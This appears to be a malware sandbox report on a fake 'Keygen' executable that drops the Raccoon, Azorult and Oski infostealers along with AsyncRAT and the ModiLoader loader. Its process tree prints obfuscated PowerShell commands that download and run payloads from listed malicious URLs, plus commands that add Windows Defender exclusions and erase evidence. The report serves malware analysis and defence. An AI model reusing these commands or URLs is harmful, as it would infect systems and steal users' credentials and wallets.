Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (123) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:50:58 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (456 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 53 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (123) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (123) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\E169.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (123) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Users\Admin\AppData\Local\Temp\E169.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1836
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1772
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
          • C:\Users\Public\abc.exe
            "C:\Users\Public\abc.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2464
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2568
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2708
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2708 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\960696743635120\\* & exit
                  8⤵
                    PID:1984
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2708
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2260
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2620
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2816
              • C:\Users\Public\abc.exe
                "C:\Users\Public\abc.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2656
                • C:\Users\Admin\AppData\Local\Temp\Tcc5ffaSVd.exe
                  "C:\Users\Admin\AppData\Local\Temp\Tcc5ffaSVd.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2404
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\Tcc5ffaSVd.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2308
                • C:\Users\Admin\AppData\Local\Temp\ouMCEaqHBb.exe
                  "C:\Users\Admin\AppData\Local\Temp\ouMCEaqHBb.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2468
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2284
                  • C:\Users\Admin\AppData\Local\Temp\RJ8FDi1gEA.exe
                    "C:\Users\Admin\AppData\Local\Temp\RJ8FDi1gEA.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2860
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\vlnwgyz1.inf
                      8⤵
                        PID:2484
                    • C:\Users\Admin\AppData\Local\Temp\InjcuA8Igy.exe
                      "C:\Users\Admin\AppData\Local\Temp\InjcuA8Igy.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2968
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2224
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\abc.exe"
                      7⤵
                        PID:2948
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:340
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\m1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:520
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2044
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:468
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E169.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1516
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
